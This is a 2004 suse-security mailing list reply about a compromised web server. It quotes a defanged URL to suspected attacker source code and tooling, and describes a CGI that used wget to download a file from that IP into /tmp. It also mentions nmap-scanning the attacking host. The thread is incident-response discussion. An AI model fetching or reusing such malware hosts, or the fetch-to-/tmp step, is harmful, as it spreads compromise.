[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [suse-security] Re: Backdoor over http(s)??



Hi Mark,

I'm not sure I can follow everything concerning this issue. Maybe you
could clarify this somehow so that a n00b liek me can follow ;-)

Am Die, den 13.01.2004 schrieb Retallack, Mark (Siemens) um 16:20:
> It looks like the source was left on the server (along with other things):

Is this just another compromised machine or the origin? A portscan shows
several open ports and the machine seems to be a Solaris 8 with an
estimated uptime of 33 days according to nmap.

> httpREMOVE://218.234.171.84/manual/.x/rs.c
> 
> Only follow the link if you know what you are doing (and remove the REMOVE
> text)

I don't quite understand why displaying rs.c in a browser window could
be harmful or am I missing something here and this URL initiates
something else inside the browser?

> The rest of the files:
> 
> httpREMOVE://218.234.171.84/manual/.x/

I've given them a look. Has anybody ever heard of a "pokemon squadron
hacking team"?!

> > > Some CGI at your webserver did run wget to receive some file from
> > > 218.234.171.84 and save it on your disc as "/tmp/.do".

Do you know how this CGI ended up on the machine? By some Apache exploit
maybe?

> > > wwwrun:nogroup are standard user and group used for apache.

Can such a CGI do any harm by running as this user? Or are CGI scripts
run by Apache given initiated by another user?

kind regards,
Tobias


-- 
Check the headers for your unsubscription address
For additional commands, e-mail: suse-security-help@xxxxxxxx
Security-related bug reports go to security@xxxxxxx, not here